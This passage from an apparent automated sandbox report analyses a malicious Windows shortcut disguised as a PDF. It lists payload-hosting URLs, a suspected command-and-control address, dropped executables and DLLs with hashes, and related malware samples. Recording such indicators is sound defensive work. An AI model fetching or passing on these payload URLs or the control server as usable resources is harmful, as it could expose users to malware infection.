                    • Avira URL Cloud: safe
                    		unknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1836408156.0000025E80232000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://bangla.b-cdn.net/sppc.dllpowershell.exe, 00000002.00000002.1836408156.0000025E81A54000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://47.84.196.148/reportsrOnedrive.exe, 00000004.00000003.3744954721.000001729C161000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000002.4145437606.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294687341.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C153000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2456893874.000001729C163000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3745161112.000001729C14A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2643148332.000001729C166000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3900915820.000001729C14A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294813782.000001729C12E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://47.84.196.148/reports3Onedrive.exe, 00000004.00000003.3294581743.000001729C154000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3294309723.000001729C153000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://bangla.b-cdn.net/onedrive.dllpowershell.exe, 00000002.00000002.1836408156.0000025E816F1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://contoso.com/powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1851578383.0000025E90075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1851578383.0000025E901B7000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://47.84.196.148/8Onedrive.exe, 00000004.00000003.3900847973.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744954721.000001729C17A000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3744733944.000001729C17A000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.1836408156.0000025E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://47.84.196.148/reportsCOnedrive.exe, 00000004.00000003.3901060263.000001729C124000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.3901159878.000001729C12E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://bangla.b-cdn.netpowershell.exe, 00000002.00000002.1836408156.0000025E81A54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E816F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1836408156.0000025E815E5000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1836408156.0000025E80001000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://47.84.196.148/reportsGOnedrive.exe, 00000004.00000003.2873197147.000001729C154000.00000004.00000020.00020000.00000000.sdmp, Onedrive.exe, 00000004.00000003.2871361393.000001729C152000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              89.35.237.170
                              		bangla.b-cdn.netRomania
                              		34304TEENTELECOMROtrue
                              47.84.196.148
                              		unknownUnited States
                              		3209VODANETInternationalIP-BackboneofVodafoneDEtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1578249
                              Start date and time:2024-12-19 13:34:08 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 7m 34s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:9
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:Scam_Transaction_of_7350_BDT.pdf.lnk.d.lnk
                              Detection:MAL
                              Classification:mal92.evad.winLNK@7/9@1/2
                              EGA Information:
                              • Successful, ratio: 50%
                              HCA Information:
                              • Successful, ratio: 98%
                              • Number of executed functions: 17
                              • Number of non-executed functions: 179
                              Cookbook Comments:
                              • Found application associated with file extension: .lnk
                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63, 4.245.163.56
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target powershell.exe, PID 7736 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              07:35:02API Interceptor53x Sleep call for process: powershell.exe modified
                              07:35:16API Interceptor11249644x Sleep call for process: Onedrive.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              89.35.237.170https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839fGet hashmaliciousUnknownBrowse
                                  http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                    http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                      https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                        https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwEGet hashmaliciousPureLog StealerBrowse
                                          https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                            https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.htmlGet hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                              https://shorturl.at/aRqLH/Get hashmaliciousUnknownBrowse
                                                https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embedGet hashmaliciousHTMLPhisherBrowse

                                                  Domains

                                                  No context

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  TEENTELECOMROhttps://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8=Get hashmaliciousUnknownBrowse
                                                  • 89.35.237.170
                                                  https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839fGet hashmaliciousUnknownBrowse
                                                  • 89.35.237.170
                                                  http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                  • 89.35.237.170
                                                  http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                  • 89.35.237.170
                                                  https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                  • 89.35.237.170
                                                  https://computeroids.com/hp-printer-driver?utm_source=Google&utm_medium=Click&utm_campaign=HP&utm_term=%7Bkeywords%7D&utm_content=%7Bmedium%7D&tm=tt&ap=gads&aaid=adaHxflMmgPq7&camp_id=12260099411&ad_g_id=118845692873&keyword=install%20hp%20printer%20to%20computer&device=c&network=searchAd&adposition=&gad_source=5&gclid=EAIaIQobChMI0JDUvuabigMV_Uf_AR2MuQCMEAAYASAAEgKQMPD_BwEGet hashmaliciousPureLog StealerBrowse
                                                  • 89.35.237.170
                                                  https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                  • 89.35.237.170
                                                  https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.htmlGet hashmaliciousCAPTCHA Scam ClickFix, LummaC StealerBrowse
                                                  • 89.35.237.170
                                                  https://shorturl.at/aRqLH/Get hashmaliciousUnknownBrowse
                                                  • 89.35.237.170
                                                  https://www.scribd.com/document/801519291/Advice-Notification#fullscreen&from_embedGet hashmaliciousHTMLPhisherBrowse
                                                  • 89.35.237.170
                                                  VODANETInternationalIP-BackboneofVodafoneDEmipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 47.84.100.146
                                                  arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 88.69.110.109
                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 88.72.154.222
                                                  mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 178.9.13.231
                                                  la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                  • 88.67.178.149
                                                  la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 109.46.80.93
                                                  la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                  • 94.218.243.142
                                                  loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                  • 2.205.237.167
                                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 139.7.173.41
                                                  powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                  • 84.62.157.32

                                                  JA3 Fingerprints

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  72a589da586844d7f0818ce684948eeainvoice.htmlGet hashmaliciousUnknownBrowse
                                                  • 47.84.196.148
                                                  BjLxqVU7m4.dllGet hashmaliciousUnknownBrowse
                                                  • 47.84.196.148
                                                  Ne7qNMCeuy.exeGet hashmaliciousUnknownBrowse
                                                  • 47.84.196.148
                                                  Q7I4ToJZ0R.exeGet hashmaliciousUnknownBrowse
                                                  • 47.84.196.148
                                                  BjLxqVU7m4.dllGet hashmaliciousUnknownBrowse
                                                  • 47.84.196.148
                                                  Ne7qNMCeuy.exeGet hashmaliciousUnknownBrowse
                                                  • 47.84.196.148
                                                  Q7I4ToJZ0R.exeGet hashmaliciousUnknownBrowse
                                                  • 47.84.196.148
                                                  LgigaSKsL6.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 47.84.196.148
                                                  file.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 47.84.196.148
                                                  mGFoU1INUk.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 47.84.196.148
                                                  3b5074b1b5d032e5620f69f9f700ff0eLbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                  • 89.35.237.170
                                                  YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                  • 89.35.237.170
                                                  raEyjKggAf.ps1Get hashmaliciousUnknownBrowse
                                                  • 89.35.237.170
                                                  gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                  • 89.35.237.170
                                                  H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                  • 89.35.237.170
                                                  0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                  • 89.35.237.170
                                                  H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                  • 89.35.237.170
                                                  KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                  • 89.35.237.170
                                                  1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                  • 89.35.237.170
                                                  StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                  • 89.35.237.170

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):11608
                                                  Entropy (8bit):4.890472898059848
                                                  Encrypted:false
                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1408
                                                  Entropy (8bit):5.4377522977757575
                                                  Encrypted:false
                                                  SSDEEP:24:3iXSKco4KmBs4RPT6BmFoUe7uomjKcm9qr9t7J0gt/NKCpnd+9tNvr6TN0:mSU4y4RQmFoUeComfm9qr9tK8NLpk9PH
                                                  MD5:B122EC93FFA48D0A76F85CF88207006F
                                                  SHA1:12D6C27E701D9235D0676300FABDADB9370395E3
                                                  SHA-256:F22A2D8ADA5CD8B8B5707B6623F6ED515CE0781BCE270A0787DF1DB7F4AF3EC7
                                                  SHA-512:755AB7BB2F874B0F26FB6C3545458AFD925603235FB7B6999CFD48345F1794B98F61373DEF01ECB58B5AC92DA5AF0F49EB0BDBB0CF9BD220891D7E3E492755AF
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:@...e................................................@..........@...............M6.]..O....PI.&........System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...

                                                  C:\Users\user\AppData\Local\Temp\Onedrive.exe

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):110536
                                                  Entropy (8bit):6.479810480369939
                                                  Encrypted:false
                                                  SSDEEP:1536:X35P3jusa9Y8yQ7tCyFvKfD/B1Tu00arKEYdkulZg6nILNnjjtCPd+:HhyvPn3BKfD/BmDd46naIl+
                                                  MD5:32C31F06E0B68F349F68AFDD08E45F3D
                                                  SHA1:E4B642F887E2C1D76B6B4777ADE91E3CB3B9E27C
                                                  SHA-256:CEA83EB34233FED5EBEEF8745C7C581A8ADBEFBCFC0E30E2D30A81000C821017
                                                  SHA-512:FE61764B471465B164C9C2202ED349605117D57CEB0ECA75ACF8BDA44E8744C115767EE0CAED0B7FEB70BA37B477D00805B3FDF0D0FA879DD4C8E3C1DC1C0D26
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:low
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......i.`.-...-...-...$......9.../...9...:...9...)...9...6...-.......9...5...9...,...9...,...Rich-...........................PE..d................."............................@....................................-................ .......................................?.......... J...p...........%..........p1..T.......................(................... ................................text............................... ..`.imrsiv..................................rdata..|H.......J..................@..@.data........`.......0..............@....pdata.......p.......2..............@..@.rsrc... J.......L...<..............@..@.reloc..............................@..B................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kay4zh5.czw.psm1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vemtfwyl.t02.ps1

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                  C:\Users\user\AppData\Local\Temp\onedrive.dll

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):103935
                                                  Entropy (8bit):7.99838838197664
                                                  Encrypted:true
                                                  SSDEEP:3072:60qxVYqu86EBItwjTJ1wMJVKhoTivyCegz27:+YquBEBkIJ1wyK6TiaCy7
                                                  MD5:3465C5A7982478CA2CE4879588765BEF
                                                  SHA1:521090C64B1F8B9CD85AC4B30A8F3AB074A48B87
                                                  SHA-256:265EB6BAFC6578DC502F61164D005E19BD2C4779ACFA9D1A1451741173C26D2A
                                                  SHA-512:DCB165BF63D7EAA840152387B28168F9421ADA445B1921CB8065D94F9A90AD3870971D5585398F4065869D965B5EFE0C1C033646B3B764B22EFB7F7648B714E7
                                                  Malicious:false
                                                  Preview:....U.u.y..y..f..A.....V...*~.."fv...9......Pc...V6.P.x./0;.P..h...).Gz.H..;_.)......s(l.....yh..V..L..c..#Tj....<b....'.a..3....|.W....Vy..k."....9..}U"4...@0Z4^.-..-......*.#......A..u........d.7.......~N.....x.K.5.q.=...&=N:...4.<...i.$6.4.....y..2.......b..U?.tdC.7..o.b..w..Z.......|u...4....0..iP..........qP6.S.h...W..?........._.Z,.....9....].......j. .+OR...\_.U..V...Y\....K.J.*.(......~.8..s....qm.K.-..T.....j.....".z...0g..b.H..K....a.W..U......@..X....d$.}.L..i.y.*.J."..t.%aJ...x"..T._.Es2.T[.rV-m.w.J@....*Y...<cZ.=.r.y..i....2>...nn...I&...!.<.....M...\P-.t.x.M.............\F0....M..g.?..N.p.RT........p5(0<B...N.k..ME........0..?.....G.k..p..a(..M?.'(t...mY..4.'u....ia.....Q...WU..$?);N&...E..np.......cj.R._...mE...t.."..".OX.....u.).........e...M.V..v ....3....L..,]......6...h.X...)...x..b.}.-k.,.....s../......<M}_..l..:..........v.Pf.. A9n!........R.6..q. "...'....?.?*:.c...Y........m.....U+..m.. H..a*..%....[..M..Cx.)...y.

                                                  C:\Users\user\AppData\Local\Temp\sppc.dll

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):371712
                                                  Entropy (8bit):5.759165377548223
                                                  Encrypted:false
                                                  SSDEEP:6144:Uw0S36K/TZciXhJD1LrYwcjyZSIFGzLlN2A/W7vsg+Nq:Uw0S36K/TZciXhJj4I8zLl/e7vsg+o
                                                  MD5:24E4E24E91E1FD8ACBEF02ABF5997317
                                                  SHA1:9EDA6BE281400218C011380929F6879DBF48754C
                                                  SHA-256:758BB067ECC1D7832D1B389CFA85B70376645694C60B5D017747B1E1664CB2F6
                                                  SHA-512:BCCB40046F1FD4C4A68422912BE4B484B7B80402111D8093EB00ECA74D831947E7B9D03E1E403A677885263EB36C130D495A7A817AAAF8EE78A5B1F64B58D357
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>...z.z.z.1...}.1.....1...p.jb..s.jb..t.jb..Z.1...y.z...1c..y.1c..{.1cH.{.1c..{.Richz.........................PE..d...N.Yg.........." ...)............ .......................................0............`..........................................Y.......p..(...............|2........... ......@=..p............................<..@............ ...............................text...-........................... ..`.rdata...Y... ...Z..................@..@.data....I...........b..............@....pdata..|2.......4...n..............@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.7181238579248297
                                                  Encrypted:false
                                                  SSDEEP:96:JAXy33CxHS1MkvhkvCCt/wfpXHcwfpAHn:JAXyyy1I/wuw4
                                                  MD5:DC426AC81BE0EF592DBC7AB9F407CE14
                                                  SHA1:C3B36A3A32210B073380B168757D1244B49E89A1
                                                  SHA-256:673FC0FF97571F98A2C99C17E3769136561BA70672F505D434644ADC3ECC3513
                                                  SHA-512:F948451610E766B23B6749908BE12B8EE621BE5B6A85AC8AA9E9A89A40AF478A7F5557C6E509981E3017EE3DD3CC9E7DE76FA50FBD8238A9A66D12B08D81D6AA
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v.....7.k.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v......`g.R...^.k.R......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y]d...........................%..A.p.p.D.a.t.a...B.V.1......Y[d..Roaming.@......CW.^.Y[d...........................cG.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Yad..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................#...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Yad....Q...........

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KGYTGUWHU7MRDNGZ8HIS.temp

                                                  Download File
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6221
                                                  Entropy (8bit):3.7181238579248297
                                                  Encrypted:false
                                                  SSDEEP:96:JAXy33CxHS1MkvhkvCCt/wfpXHcwfpAHn:JAXyyy1I/wuw4
                                                  MD5:DC426AC81BE0EF592DBC7AB9F407CE14
                                                  SHA1:C3B36A3A32210B073380B168757D1244B49E89A1
                                                  SHA-256:673FC0FF97571F98A2C99C17E3769136561BA70672F505D434644ADC3ECC3513
                                                  SHA-512:F948451610E766B23B6749908BE12B8EE621BE5B6A85AC8AA9E9A89A40AF478A7F5557C6E509981E3017EE3DD3CC9E7DE76FA50FBD8238A9A66D12B08D81D6AA
                                                  Malicious:false
                                                  Preview:...................................FL..................F.".. ...-/.v.....7.k.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v......`g.R...^.k.R......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y]d...........................%..A.p.p.D.a.t.a...B.V.1......Y[d..Roaming.@......CW.^.Y[d...........................cG.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Yad..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..........................#...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Yad....Q...........

                                                  Static File Info

                                                  General

                                                  File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Mon Nov 25 05:23:08 2024, mtime=Mon Dec 9 04:00:07 2024, atime=Mon Nov 25 05:23:08 2024, length=339968, window=hide
                                                  Entropy (8bit):4.5252541581078685
                                                  TrID:
